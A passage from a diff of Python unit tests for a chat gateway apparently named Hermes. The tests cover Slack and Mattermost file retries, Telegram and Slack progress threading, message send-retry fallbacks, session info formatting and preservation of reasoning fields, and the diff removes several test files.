|
||||
|
||||
fake_response = MagicMock()
|
||||
fake_response.content = b"raw bytes here"
|
||||
fake_response.raise_for_status = MagicMock()
|
||||
|
||||
mock_client = AsyncMock()
|
||||
mock_client.get = AsyncMock(return_value=fake_response)
|
||||
mock_client.__aenter__ = AsyncMock(return_value=mock_client)
|
||||
mock_client.__aexit__ = AsyncMock(return_value=False)
|
||||
|
||||
async def run():
|
||||
with patch("httpx.AsyncClient", return_value=mock_client):
|
||||
return await adapter._download_slack_file_bytes(
|
||||
"https://files.slack.com/file.bin"
|
||||
)
|
||||
|
||||
result = asyncio.run(run())
|
||||
assert result == b"raw bytes here"
|
||||
|
||||
def test_retries_on_429_then_succeeds(self):
|
||||
"""429 on first attempt is retried; raw bytes returned on second."""
|
||||
adapter = _make_slack_adapter()
|
||||
|
||||
ok_response = MagicMock()
|
||||
ok_response.content = b"final bytes"
|
||||
ok_response.raise_for_status = MagicMock()
|
||||
|
||||
mock_client = AsyncMock()
|
||||
mock_client.get = AsyncMock(
|
||||
side_effect=[_make_http_status_error(429), ok_response]
|
||||
)
|
||||
mock_client.__aenter__ = AsyncMock(return_value=mock_client)
|
||||
mock_client.__aexit__ = AsyncMock(return_value=False)
|
||||
|
||||
async def run():
|
||||
with patch("httpx.AsyncClient", return_value=mock_client), \
|
||||
patch("asyncio.sleep", new_callable=AsyncMock):
|
||||
return await adapter._download_slack_file_bytes(
|
||||
"https://files.slack.com/file.bin"
|
||||
)
|
||||
|
||||
result = asyncio.run(run())
|
||||
assert result == b"final bytes"
|
||||
assert mock_client.get.call_count == 2
|
||||
|
||||
def test_raises_after_max_retries(self):
|
||||
"""Persistent timeouts raise after all 3 attempts are exhausted."""
|
||||
adapter = _make_slack_adapter()
|
||||
|
||||
mock_client = AsyncMock()
|
||||
mock_client.get = AsyncMock(side_effect=_make_timeout_error())
|
||||
mock_client.__aenter__ = AsyncMock(return_value=mock_client)
|
||||
mock_client.__aexit__ = AsyncMock(return_value=False)
|
||||
|
||||
async def run():
|
||||
with patch("httpx.AsyncClient", return_value=mock_client), \
|
||||
patch("asyncio.sleep", new_callable=AsyncMock):
|
||||
await adapter._download_slack_file_bytes(
|
||||
"https://files.slack.com/file.bin"
|
||||
)
|
||||
|
||||
with pytest.raises(httpx.TimeoutException):
|
||||
asyncio.run(run())
|
||||
|
||||
assert mock_client.get.call_count == 3
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# MattermostAdapter._send_url_as_file
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
def _make_mm_adapter():
|
||||
"""Build a minimal MattermostAdapter with mocked internals."""
|
||||
from gateway.platforms.mattermost import MattermostAdapter
|
||||
config = PlatformConfig(
|
||||
enabled=True, token="mm-token-fake",
|
||||
extra={"url": "https://mm.example.com"},
|
||||
)
|
||||
adapter = MattermostAdapter(config)
|
||||
adapter._session = MagicMock()
|
||||
adapter._upload_file = AsyncMock(return_value="file-id-123")
|
||||
adapter._api_post = AsyncMock(return_value={"id": "post-id-abc"})
|
||||
adapter.send = AsyncMock(return_value=MagicMock(success=True))
|
||||
return adapter
|
||||
|
||||
|
||||
def _make_aiohttp_resp(status: int, content: bytes = b"file bytes",
|
||||
content_type: str = "image/jpeg"):
|
||||
"""Build a context-manager mock for an aiohttp response."""
|
||||
resp = MagicMock()
|
||||
resp.status = status
|
||||
resp.content_type = content_type
|
||||
resp.read = AsyncMock(return_value=content)
|
||||
resp.__aenter__ = AsyncMock(return_value=resp)
|
||||
resp.__aexit__ = AsyncMock(return_value=False)
|
||||
return resp
|
||||
|
||||
|
||||
class TestMattermostSendUrlAsFile:
|
||||
"""Tests for MattermostAdapter._send_url_as_file"""
|
||||
|
||||
def test_success_on_first_attempt(self):
|
||||
"""200 on first attempt → file uploaded and post created."""
|
||||
adapter = _make_mm_adapter()
|
||||
resp = _make_aiohttp_resp(200)
|
||||
adapter._session.get = MagicMock(return_value=resp)
|
||||
|
||||
async def run():
|
||||
with patch("asyncio.sleep", new_callable=AsyncMock):
|
||||
return await adapter._send_url_as_file(
|
||||
"C123", "http://cdn.example.com/img.png", "caption", None
|
||||
)
|
||||
|
||||
result = asyncio.run(run())
|
||||
assert result.success
|
||||
adapter._upload_file.assert_called_once()
|
||||
adapter._api_post.assert_called_once()
|
||||
|
||||
def test_retries_on_429_then_succeeds(self):
|
||||
"""429 on first attempt is retried; 200 on second attempt succeeds."""
|
||||
adapter = _make_mm_adapter()
|
||||
|
||||
resp_429 = _make_aiohttp_resp(429)
|
||||
resp_200 = _make_aiohttp_resp(200)
|
||||
adapter._session.get = MagicMock(side_effect=[resp_429, resp_200])
|
||||
|
||||
mock_sleep = AsyncMock()
|
||||
|
||||
async def run():
|
||||
with patch("asyncio.sleep", mock_sleep):
|
||||
return await adapter._send_url_as_file(
|
||||
"C123", "http://cdn.example.com/img.png", None, None
|
||||
)
|
||||
|
||||
result = asyncio.run(run())
|
||||
assert result.success
|
||||
assert adapter._session.get.call_count == 2
|
||||
mock_sleep.assert_called_once()
|
||||
|
||||
def test_retries_on_500_then_succeeds(self):
|
||||
"""5xx on first attempt is retried; 200 on second attempt succeeds."""
|
||||
adapter = _make_mm_adapter()
|
||||
|
||||
resp_500 = _make_aiohttp_resp(500)
|
||||
resp_200 = _make_aiohttp_resp(200)
|
||||
adapter._session.get = MagicMock(side_effect=[resp_500, resp_200])
|
||||
|
||||
async def run():
|
||||
with patch("asyncio.sleep", new_callable=AsyncMock):
|
||||
return await adapter._send_url_as_file(
|
||||
"C123", "http://cdn.example.com/img.png", None, None
|
||||
)
|
||||
|
||||
result = asyncio.run(run())
|
||||
assert result.success
|
||||
assert adapter._session.get.call_count == 2
|
||||
|
||||
def test_falls_back_to_text_after_max_retries_on_5xx(self):
|
||||
"""Three consecutive 500s exhaust retries; falls back to send() with URL text."""
|
||||
adapter = _make_mm_adapter()
|
||||
|
||||
resp_500 = _make_aiohttp_resp(500)
|
||||
adapter._session.get = MagicMock(return_value=resp_500)
|
||||
|
||||
async def run():
|
||||
with patch("asyncio.sleep", new_callable=AsyncMock):
|
||||
return await adapter._send_url_as_file(
|
||||
"C123", "http://cdn.example.com/img.png", "my caption", None
|
||||
)
|
||||
|
||||
asyncio.run(run())
|
||||
|
||||
adapter.send.assert_called_once()
|
||||
text_arg = adapter.send.call_args[0][1]
|
||||
assert "http://cdn.example.com/img.png" in text_arg
|
||||
|
||||
def test_falls_back_on_client_error(self):
|
||||
"""aiohttp.ClientError on every attempt falls back to send() with URL."""
|
||||
import aiohttp
|
||||
|
||||
adapter = _make_mm_adapter()
|
||||
|
||||
error_resp = MagicMock()
|
||||
error_resp.__aenter__ = AsyncMock(
|
||||
side_effect=aiohttp.ClientConnectionError("connection refused")
|
||||
)
|
||||
error_resp.__aexit__ = AsyncMock(return_value=False)
|
||||
adapter._session.get = MagicMock(return_value=error_resp)
|
||||
|
||||
async def run():
|
||||
with patch("asyncio.sleep", new_callable=AsyncMock):
|
||||
return await adapter._send_url_as_file(
|
||||
"C123", "http://cdn.example.com/img.png", None, None
|
||||
)
|
||||
|
||||
asyncio.run(run())
|
||||
|
||||
adapter.send.assert_called_once()
|
||||
text_arg = adapter.send.call_args[0][1]
|
||||
assert "http://cdn.example.com/img.png" in text_arg
|
||||
|
||||
def test_non_retryable_404_falls_back_immediately(self):
|
||||
"""404 is non-retryable (< 500, != 429); send() is called right away."""
|
||||
adapter = _make_mm_adapter()
|
||||
|
||||
resp_404 = _make_aiohttp_resp(404)
|
||||
adapter._session.get = MagicMock(return_value=resp_404)
|
||||
|
||||
mock_sleep = AsyncMock()
|
||||
|
||||
async def run():
|
||||
with patch("asyncio.sleep", mock_sleep):
|
||||
return await adapter._send_url_as_file(
|
||||
"C123", "http://cdn.example.com/img.png", None, None
|
||||
)
|
||||
|
||||
asyncio.run(run())
|
||||
|
||||
adapter.send.assert_called_once()
|
||||
# No sleep — fell back on first attempt
|
||||
mock_sleep.assert_not_called()
|
||||
assert adapter._session.get.call_count == 1
|
||||
@@ -14,8 +14,8 @@ from gateway.session import SessionSource
|
||||
|
||||
|
||||
class ProgressCaptureAdapter(BasePlatformAdapter):
|
||||
def __init__(self, platform=Platform.TELEGRAM):
|
||||
super().__init__(PlatformConfig(enabled=True, token="***"), platform)
|
||||
def __init__(self):
|
||||
super().__init__(PlatformConfig(enabled=True, token="fake-token"), Platform.TELEGRAM)
|
||||
self.sent = []
|
||||
self.edits = []
|
||||
self.typing = []
|
||||
@@ -76,7 +76,7 @@ def _make_runner(adapter):
|
||||
GatewayRunner = gateway_run.GatewayRunner
|
||||
|
||||
runner = object.__new__(GatewayRunner)
|
||||
runner.adapters = {adapter.platform: adapter}
|
||||
runner.adapters = {Platform.TELEGRAM: adapter}
|
||||
runner._voice_mode = {}
|
||||
runner._prefill_messages = []
|
||||
runner._ephemeral_system_prompt = ""
|
||||
@@ -133,87 +133,3 @@ async def test_run_agent_progress_stays_in_originating_topic(monkeypatch, tmp_pa
|
||||
]
|
||||
assert adapter.edits
|
||||
assert all(call["metadata"] == {"thread_id": "17585"} for call in adapter.typing)
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_run_agent_progress_does_not_use_event_message_id_for_telegram_dm(monkeypatch, tmp_path):
|
||||
"""Telegram DM progress must not reuse event message id as thread metadata."""
|
||||
monkeypatch.setenv("HERMES_TOOL_PROGRESS_MODE", "all")
|
||||
|
||||
fake_dotenv = types.ModuleType("dotenv")
|
||||
fake_dotenv.load_dotenv = lambda *args, **kwargs: None
|
||||
monkeypatch.setitem(sys.modules, "dotenv", fake_dotenv)
|
||||
|
||||
fake_run_agent = types.ModuleType("run_agent")
|
||||
fake_run_agent.AIAgent = FakeAgent
|
||||
monkeypatch.setitem(sys.modules, "run_agent", fake_run_agent)
|
||||
|
||||
adapter = ProgressCaptureAdapter(platform=Platform.TELEGRAM)
|
||||
runner = _make_runner(adapter)
|
||||
gateway_run = importlib.import_module("gateway.run")
|
||||
monkeypatch.setattr(gateway_run, "_hermes_home", tmp_path)
|
||||
monkeypatch.setattr(gateway_run, "_resolve_runtime_agent_kwargs", lambda: {"api_key": "***"})
|
||||
|
||||
source = SessionSource(
|
||||
platform=Platform.TELEGRAM,
|
||||
chat_id="12345",
|
||||
chat_type="dm",
|
||||
thread_id=None,
|
||||
)
|
||||
|
||||
result = await runner._run_agent(
|
||||
message="hello",
|
||||
context_prompt="",
|
||||
history=[],
|
||||
source=source,
|
||||
session_id="sess-2",
|
||||
session_key="agent:main:telegram:dm:12345",
|
||||
event_message_id="777",
|
||||
)
|
||||
|
||||
assert result["final_response"] == "done"
|
||||
assert adapter.sent
|
||||
assert adapter.sent[0]["metadata"] is None
|
||||
assert all(call["metadata"] is None for call in adapter.typing)
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_run_agent_progress_uses_event_message_id_for_slack_dm(monkeypatch, tmp_path):
|
||||
"""Slack DM progress should keep event ts fallback threading."""
|
||||
monkeypatch.setenv("HERMES_TOOL_PROGRESS_MODE", "all")
|
||||
|
||||
fake_dotenv = types.ModuleType("dotenv")
|
||||
fake_dotenv.load_dotenv = lambda *args, **kwargs: None
|
||||
monkeypatch.setitem(sys.modules, "dotenv", fake_dotenv)
|
||||
|
||||
fake_run_agent = types.ModuleType("run_agent")
|
||||
fake_run_agent.AIAgent = FakeAgent
|
||||
monkeypatch.setitem(sys.modules, "run_agent", fake_run_agent)
|
||||
|
||||
adapter = ProgressCaptureAdapter(platform=Platform.SLACK)
|
||||
runner = _make_runner(adapter)
|
||||
gateway_run = importlib.import_module("gateway.run")
|
||||
monkeypatch.setattr(gateway_run, "_hermes_home", tmp_path)
|
||||
monkeypatch.setattr(gateway_run, "_resolve_runtime_agent_kwargs", lambda: {"api_key": "***"})
|
||||
|
||||
source = SessionSource(
|
||||
platform=Platform.SLACK,
|
||||
chat_id="D123",
|
||||
chat_type="dm",
|
||||
thread_id=None,
|
||||
)
|
||||
|
||||
result = await runner._run_agent(
|
||||
message="hello",
|
||||
context_prompt="",
|
||||
history=[],
|
||||
source=source,
|
||||
session_id="sess-3",
|
||||
session_key="agent:main:slack:dm:D123",
|
||||
event_message_id="1234567890.000001",
|
||||
)
|
||||
|
||||
assert result["final_response"] == "done"
|
||||
assert adapter.sent
|
||||
assert adapter.sent[0]["metadata"] == {"thread_id": "1234567890.000001"}
|
||||
assert all(call["metadata"] == {"thread_id": "1234567890.000001"} for call in adapter.typing)
|
||||
|
||||
@@ -76,7 +76,7 @@ def _ensure_telegram_mock():
|
||||
telegram_mod.constants.ChatType.CHANNEL = "channel"
|
||||
telegram_mod.constants.ChatType.PRIVATE = "private"
|
||||
|
||||
for name in ("telegram", "telegram.ext", "telegram.constants", "telegram.request"):
|
||||
for name in ("telegram", "telegram.ext", "telegram.constants"):
|
||||
sys.modules.setdefault(name, telegram_mod)
|
||||
|
||||
|
||||
|
||||
@@ -1,231 +0,0 @@
|
||||
"""
|
||||
Tests for BasePlatformAdapter._send_with_retry and _is_retryable_error.
|
||||
|
||||
Verifies that:
|
||||
- Transient network errors trigger retry with backoff
|
||||
- Permanent errors fall back to plain-text immediately (no retry)
|
||||
- User receives a delivery-failure notice when all retries are exhausted
|
||||
- Successful sends on retry return success
|
||||
- SendResult.retryable flag is respected
|
||||
"""
|
||||
import pytest
|
||||
from unittest.mock import AsyncMock, patch
|
||||
|
||||
from gateway.platforms.base import BasePlatformAdapter, SendResult, _RETRYABLE_ERROR_PATTERNS
|
||||
from gateway.platforms.base import Platform, PlatformConfig
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Minimal concrete adapter for testing (no real network)
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class _StubAdapter(BasePlatformAdapter):
|
||||
def __init__(self):
|
||||
cfg = PlatformConfig()
|
||||
super().__init__(cfg, Platform.TELEGRAM)
|
||||
self._send_results = [] # queue of SendResult to return per call
|
||||
self._send_calls = [] # record of (chat_id, content) sent
|
||||
|
||||
def _next_result(self) -> SendResult:
|
||||
if self._send_results:
|
||||
return self._send_results.pop(0)
|
||||
return SendResult(success=True, message_id="ok")
|
||||
|
||||
async def send(self, chat_id, content, reply_to=None, metadata=None, **kwargs) -> SendResult:
|
||||
self._send_calls.append((chat_id, content))
|
||||
return self._next_result()
|
||||
|
||||
async def connect(self) -> bool:
|
||||
return True
|
||||
|
||||
async def disconnect(self) -> None:
|
||||
pass
|
||||
|
||||
async def send_typing(self, chat_id, metadata=None) -> None:
|
||||
pass
|
||||
|
||||
async def get_chat_info(self, chat_id):
|
||||
return {"name": "test", "type": "direct", "chat_id": chat_id}
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# _is_retryable_error
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestIsRetryableError:
|
||||
def test_none_is_not_retryable(self):
|
||||
assert not _StubAdapter._is_retryable_error(None)
|
||||
|
||||
def test_empty_string_is_not_retryable(self):
|
||||
assert not _StubAdapter._is_retryable_error("")
|
||||
|
||||
@pytest.mark.parametrize("pattern", _RETRYABLE_ERROR_PATTERNS)
|
||||
def test_known_pattern_is_retryable(self, pattern):
|
||||
assert _StubAdapter._is_retryable_error(f"httpx.{pattern.title()}: connection dropped")
|
||||
|
||||
def test_permission_error_not_retryable(self):
|
||||
assert not _StubAdapter._is_retryable_error("Forbidden: bot was blocked by the user")
|
||||
|
||||
def test_bad_request_not_retryable(self):
|
||||
assert not _StubAdapter._is_retryable_error("Bad Request: can't parse entities")
|
||||
|
||||
def test_case_insensitive(self):
|
||||
assert _StubAdapter._is_retryable_error("CONNECTERROR: host unreachable")
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# _send_with_retry — success on first attempt
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestSendWithRetrySuccess:
|
||||
@pytest.mark.asyncio
|
||||
async def test_success_first_attempt(self):
|
||||
adapter = _StubAdapter()
|
||||
adapter._send_results = [SendResult(success=True, message_id="123")]
|
||||
result = await adapter._send_with_retry("chat1", "hello")
|
||||
assert result.success
|
||||
assert len(adapter._send_calls) == 1
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_returns_message_id(self):
|
||||
adapter = _StubAdapter()
|
||||
adapter._send_results = [SendResult(success=True, message_id="abc")]
|
||||
result = await adapter._send_with_retry("chat1", "hi")
|
||||
assert result.message_id == "abc"
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# _send_with_retry — network error with successful retry
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestSendWithRetryNetworkRetry:
|
||||
@pytest.mark.asyncio
|
||||
async def test_retries_on_connect_error_and_succeeds(self):
|
||||
adapter = _StubAdapter()
|
||||
adapter._send_results = [
|
||||
SendResult(success=False, error="httpx.ConnectError: connection refused"),
|
||||
SendResult(success=True, message_id="ok"),
|
||||
]
|
||||
with patch("asyncio.sleep", new_callable=AsyncMock):
|
||||
result = await adapter._send_with_retry("chat1", "hello", max_retries=2, base_delay=0)
|
||||
assert result.success
|
||||
assert len(adapter._send_calls) == 2 # initial + 1 retry
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_retries_on_timeout_and_succeeds(self):
|
||||
adapter = _StubAdapter()
|
||||
adapter._send_results = [
|
||||
SendResult(success=False, error="ReadTimeout: request timed out"),
|
||||
SendResult(success=False, error="ReadTimeout: request timed out"),
|
||||
SendResult(success=True, message_id="ok"),
|
||||
]
|
||||
with patch("asyncio.sleep", new_callable=AsyncMock):
|
||||
result = await adapter._send_with_retry("chat1", "hello", max_retries=3, base_delay=0)
|
||||
assert result.success
|
||||
assert len(adapter._send_calls) == 3
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_retryable_flag_respected(self):
|
||||
"""SendResult.retryable=True should trigger retry even if error string doesn't match."""
|
||||
adapter = _StubAdapter()
|
||||
adapter._send_results = [
|
||||
SendResult(success=False, error="internal platform error", retryable=True),
|
||||
SendResult(success=True, message_id="ok"),
|
||||
]
|
||||
with patch("asyncio.sleep", new_callable=AsyncMock):
|
||||
result = await adapter._send_with_retry("chat1", "hello", max_retries=2, base_delay=0)
|
||||
assert result.success
|
||||
assert len(adapter._send_calls) == 2
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_network_to_nonnetwork_transition_falls_back_to_plaintext(self):
|
||||
"""If error switches from network to formatting mid-retry, fall through to plain-text fallback."""
|
||||
adapter = _StubAdapter()
|
||||
adapter._send_results = [
|
||||
SendResult(success=False, error="httpx.ConnectError: host unreachable"),
|
||||
SendResult(success=False, error="Bad Request: can't parse entities"),
|
||||
SendResult(success=True, message_id="fallback_ok"), # plain-text fallback
|
||||
]
|
||||
with patch("asyncio.sleep", new_callable=AsyncMock):
|
||||
result = await adapter._send_with_retry("chat1", "**bold**", max_retries=2, base_delay=0)
|
||||
assert result.success
|
||||
# 3 calls: initial (network) + 1 retry (non-network, breaks loop) + plain-text fallback
|
||||
assert len(adapter._send_calls) == 3
|
||||
assert "plain text" in adapter._send_calls[-1][1].lower()
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# _send_with_retry — all retries exhausted → user notification
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestSendWithRetryExhausted:
|
||||
@pytest.mark.asyncio
|
||||
async def test_sends_user_notice_after_exhaustion(self):
|
||||
adapter = _StubAdapter()
|
||||
network_err = SendResult(success=False, error="httpx.ConnectError: host unreachable")
|
||||
# initial + 2 retries + notice attempt
|
||||
adapter._send_results = [network_err, network_err, network_err, SendResult(success=True)]
|
||||
with patch("asyncio.sleep", new_callable=AsyncMock):
|
||||
result = await adapter._send_with_retry("chat1", "hello", max_retries=2, base_delay=0)
|
||||
# Result is the last failed one (before notice)
|
||||
assert not result.success
|
||||
# 4 total calls: 1 initial + 2 retries + 1 notice
|
||||
assert len(adapter._send_calls) == 4
|
||||
# The notice content should mention delivery failure
|
||||
notice_content = adapter._send_calls[-1][1]
|
||||
assert "delivery failed" in notice_content.lower() or "Message delivery failed" in notice_content
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_notice_send_exception_doesnt_propagate(self):
|
||||
"""If the notice itself throws, _send_with_retry should not raise."""
|
||||
adapter = _StubAdapter()
|
||||
network_err = SendResult(success=False, error="ConnectError")
|
||||
adapter._send_results = [network_err, network_err, network_err]
|
||||
|
||||
original_send = adapter.send
|
||||
call_count = [0]
|
||||
|
||||
async def send_with_notice_failure(chat_id, content, **kwargs):
|
||||
call_count[0] += 1
|
||||
if call_count[0] > 3:
|
||||
raise RuntimeError("notice send also failed")
|
||||
return network_err
|
||||
|
||||
adapter.send = send_with_notice_failure
|
||||
with patch("asyncio.sleep", new_callable=AsyncMock):
|
||||
result = await adapter._send_with_retry("chat1", "hello", max_retries=2, base_delay=0)
|
||||
assert not result.success # still failed, but no exception raised
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# _send_with_retry — non-network failure → plain-text fallback (no retry)
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestSendWithRetryFallback:
|
||||
@pytest.mark.asyncio
|
||||
async def test_non_network_error_falls_back_immediately(self):
|
||||
adapter = _StubAdapter()
|
||||
adapter._send_results = [
|
||||
SendResult(success=False, error="Bad Request: can't parse entities"),
|
||||
SendResult(success=True, message_id="fallback_ok"),
|
||||
]
|
||||
with patch("asyncio.sleep", new_callable=AsyncMock) as mock_sleep:
|
||||
result = await adapter._send_with_retry("chat1", "**bold**", max_retries=2, base_delay=0)
|
||||
# No sleep — no retry loop for non-network errors
|
||||
mock_sleep.assert_not_called()
|
||||
assert result.success
|
||||
assert len(adapter._send_calls) == 2
|
||||
# Fallback content should be plain-text notice
|
||||
assert "plain text" in adapter._send_calls[1][1].lower()
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_fallback_failure_logged_but_not_raised(self):
|
||||
adapter = _StubAdapter()
|
||||
adapter._send_results = [
|
||||
SendResult(success=False, error="Forbidden: bot blocked"),
|
||||
SendResult(success=False, error="Forbidden: bot blocked"),
|
||||
]
|
||||
with patch("asyncio.sleep", new_callable=AsyncMock):
|
||||
result = await adapter._send_with_retry("chat1", "hello", max_retries=2)
|
||||
assert not result.success
|
||||
assert len(adapter._send_calls) == 2 # original + fallback only
|
||||
@@ -846,7 +846,7 @@ class TestLastPromptTokens:
|
||||
|
||||
store.update_session("k1", model="openai/gpt-5.4")
|
||||
|
||||
store._db.set_token_counts.assert_called_once_with(
|
||||
store._db.update_token_counts.assert_called_once_with(
|
||||
"s1",
|
||||
input_tokens=0,
|
||||
output_tokens=0,
|
||||
@@ -858,48 +858,4 @@ class TestLastPromptTokens:
|
||||
billing_provider=None,
|
||||
billing_base_url=None,
|
||||
model="openai/gpt-5.4",
|
||||
absolute=True,
|
||||
)
|
||||
|
||||
|
||||
class TestRewriteTranscriptPreservesReasoning:
|
||||
"""rewrite_transcript must not drop reasoning fields from SQLite."""
|
||||
|
||||
def test_reasoning_survives_rewrite(self, tmp_path):
|
||||
from hermes_state import SessionDB
|
||||
|
||||
db = SessionDB(db_path=tmp_path / "test.db")
|
||||
session_id = "reasoning-test"
|
||||
db.create_session(session_id=session_id, source="cli")
|
||||
|
||||
# Insert a message WITH all three reasoning fields
|
||||
db.append_message(
|
||||
session_id=session_id,
|
||||
role="assistant",
|
||||
content="The answer is 42.",
|
||||
reasoning="I need to think step by step.",
|
||||
reasoning_details=[{"type": "summary", "text": "step by step"}],
|
||||
codex_reasoning_items=[{"id": "r1", "type": "reasoning"}],
|
||||
)
|
||||
|
||||
# Verify all three were stored
|
||||
before = db.get_messages_as_conversation(session_id)
|
||||
assert before[0].get("reasoning") == "I need to think step by step."
|
||||
assert before[0].get("reasoning_details") == [{"type": "summary", "text": "step by step"}]
|
||||
assert before[0].get("codex_reasoning_items") == [{"id": "r1", "type": "reasoning"}]
|
||||
|
||||
# Now simulate /retry: build the SessionStore and call rewrite_transcript
|
||||
config = GatewayConfig()
|
||||
with patch("gateway.session.SessionStore._ensure_loaded"):
|
||||
store = SessionStore(sessions_dir=tmp_path, config=config)
|
||||
store._db = db
|
||||
store._loaded = True
|
||||
|
||||
# rewrite_transcript receives the messages that load_transcript returned
|
||||
store.rewrite_transcript(session_id, before)
|
||||
|
||||
# Load again — all three reasoning fields must survive
|
||||
after = db.get_messages_as_conversation(session_id)
|
||||
assert after[0].get("reasoning") == "I need to think step by step."
|
||||
assert after[0].get("reasoning_details") == [{"type": "summary", "text": "step by step"}]
|
||||
assert after[0].get("codex_reasoning_items") == [{"id": "r1", "type": "reasoning"}]
|
||||
|
||||
@@ -1,110 +0,0 @@
|
||||
"""Tests for GatewayRunner._format_session_info — session config surfacing."""
|
||||
|
||||
import pytest
|
||||
from unittest.mock import patch, MagicMock
|
||||
from pathlib import Path
|
||||
|
||||
from gateway.run import GatewayRunner
|
||||
|
||||
|
||||
@pytest.fixture()
|
||||
def runner():
|
||||
"""Create a bare GatewayRunner without __init__."""
|
||||
return GatewayRunner.__new__(GatewayRunner)
|
||||
|
||||
|
||||
def _patch_info(tmp_path, config_yaml, model, runtime):
|
||||
"""Return a context-manager stack that patches _format_session_info deps."""
|
||||
cfg_path = tmp_path / "config.yaml"
|
||||
if config_yaml is not None:
|
||||
cfg_path.write_text(config_yaml)
|
||||
return (
|
||||
patch("gateway.run._hermes_home", tmp_path),
|
||||
patch("gateway.run._resolve_gateway_model", return_value=model),
|
||||
patch("gateway.run._resolve_runtime_agent_kwargs", return_value=runtime),
|
||||
)
|
||||
|
||||
|
||||
class TestFormatSessionInfo:
|
||||
|
||||
def test_includes_model_name(self, runner, tmp_path):
|
||||
p1, p2, p3 = _patch_info(tmp_path, "model:\n default: anthropic/claude-opus-4.6\n provider: openrouter\n",
|
||||
"anthropic/claude-opus-4.6",
|
||||
{"provider": "openrouter", "base_url": "https://openrouter.ai/api/v1", "api_key": "k"})
|
||||
with p1, p2, p3:
|
||||
info = runner._format_session_info()
|
||||
assert "claude-opus-4.6" in info
|
||||
|
||||
def test_includes_provider(self, runner, tmp_path):
|
||||
p1, p2, p3 = _patch_info(tmp_path, "model:\n default: test-model\n provider: openrouter\n",
|
||||
"test-model",
|
||||
{"provider": "openrouter", "base_url": "", "api_key": ""})
|
||||
with p1, p2, p3:
|
||||
info = runner._format_session_info()
|
||||
assert "openrouter" in info
|
||||
|
||||
def test_config_context_length(self, runner, tmp_path):
|
||||
p1, p2, p3 = _patch_info(tmp_path, "model:\n default: test-model\n context_length: 32768\n",
|
||||
"test-model",
|
||||
{"provider": "custom", "base_url": "", "api_key": ""})
|
||||
with p1, p2, p3:
|
||||
info = runner._format_session_info()
|
||||
assert "32K" in info
|
||||
assert "config" in info
|
||||
|
||||
def test_default_fallback_hint(self, runner, tmp_path):
|
||||
p1, p2, p3 = _patch_info(tmp_path, "model:\n default: unknown-model-xyz\n",
|
||||
"unknown-model-xyz",
|
||||
{"provider": "", "base_url": "", "api_key": ""})
|
||||
with p1, p2, p3:
|
||||
info = runner._format_session_info()
|
||||
assert "128K" in info
|
||||
assert "model.context_length" in info
|
||||
|
||||
def test_local_endpoint_shown(self, runner, tmp_path):
|
||||
p1, p2, p3 = _patch_info(
|
||||
tmp_path,
|
||||
"model:\n default: qwen3:8b\n provider: custom\n base_url: http://localhost:11434/v1\n context_length: 8192\n",
|
||||
"qwen3:8b",
|
||||
{"provider": "custom", "base_url": "http://localhost:11434/v1", "api_key": ""})
|
||||
with p1, p2, p3:
|
||||
info = runner._format_session_info()
|
||||
assert "localhost:11434" in info
|
||||
assert "8K" in info
|
||||
|
||||
def test_cloud_endpoint_hidden(self, runner, tmp_path):
|
||||
p1, p2, p3 = _patch_info(tmp_path, "model:\n default: test-model\n provider: openrouter\n",
|
||||
"test-model",
|
||||
{"provider": "openrouter", "base_url": "https://openrouter.ai/api/v1", "api_key": "k"})
|
||||
with p1, p2, p3:
|
||||
info = runner._format_session_info()
|
||||
assert "Endpoint" not in info
|
||||
|
||||
def test_million_context_format(self, runner, tmp_path):
|
||||
p1, p2, p3 = _patch_info(tmp_path, "model:\n default: test-model\n context_length: 1000000\n",
|
||||
"test-model",
|
||||
{"provider": "", "base_url": "", "api_key": ""})
|
||||
with p1, p2, p3:
|
||||
info = runner._format_session_info()
|
||||
assert "1.0M" in info
|
||||
|
||||
def test_missing_config(self, runner, tmp_path):
|
||||
"""No config.yaml should not crash."""
|
||||
p1, p2, p3 = _patch_info(tmp_path, None, # don't create config
|
||||
"anthropic/claude-sonnet-4.6",
|
||||
{"provider": "openrouter", "base_url": "", "api_key": ""})
|
||||
with p1, p2, p3:
|
||||
info = runner._format_session_info()
|
||||
assert "Model" in info
|
||||
assert "Context" in info
|
||||
|
||||
def test_runtime_resolution_failure_doesnt_crash(self, runner, tmp_path):
|
||||
"""If runtime resolution raises, should still produce output."""
|
||||
cfg_path = tmp_path / "config.yaml"
|
||||
cfg_path.write_text("model:\n default: test-model\n context_length: 4096\n")
|
||||
with patch("gateway.run._hermes_home", tmp_path), \
|
||||
patch("gateway.run._resolve_gateway_model", return_value="test-model"), \
|
||||
patch("gateway.run._resolve_runtime_agent_kwargs", side_effect=RuntimeError("no creds")):
|
||||
info = runner._format_session_info()
|
||||
assert "4K" in info
|
||||
assert "config" in info
|
||||
@@ -1,280 +0,0 @@
|
||||
"""Tests for SSE client disconnect → agent task cancellation.
|
||||
|
||||
When a streaming /v1/chat/completions client disconnects mid-stream
|
||||
(network drop, browser tab close), the agent is interrupted via
|
||||
agent.interrupt() so it stops making LLM API calls, and the asyncio
|
||||
task wrapper is cancelled.
|
||||
"""
|
||||
|
||||
import asyncio
|
||||
import json
|
||||
import queue
|
||||
